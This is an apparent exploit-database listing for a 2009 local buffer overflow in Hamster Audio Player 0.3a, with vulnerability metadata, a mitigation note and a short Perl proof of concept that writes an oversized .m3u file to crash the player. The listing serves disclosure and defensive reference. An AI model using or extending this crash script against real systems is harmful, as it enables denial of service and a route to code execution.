header-logo
Suggest Exploit
vendor:
Hamster Audio Player
by:
ThE g0bL!N
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Hamster Audio Player
Affected Version From: 0.3a
Affected Version To: 0.3a
Patch Exists: YES
Related CWE: N/A
CPE: a:hamster_audio_player:hamster_audio_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Hamster Audio Player 0.3a Local BOF PoC

A buffer overflow vulnerability exists in Hamster Audio Player 0.3a. By creating a specially crafted .m3u file, an attacker can cause a buffer overflow, resulting in a denial of service or the execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Hamster Audio Player.
Source

Exploit-DB raw data:

# Hamster Audio Player 0.3a  Local BOF PoC
my $crash="\x41" x 4113 ;
open(myfile,'>>PoC.m3u')#/HPL
print myfile $crash;
# By ThE g0bL!N
#Download:http://www.brothersoft.com/hamster-audio-player-download-235347.html
#Note: His0k4 Win Rak :(

# milw0rm.com [2009-07-15]

Navigation

Suggest Exploit

Services By CQR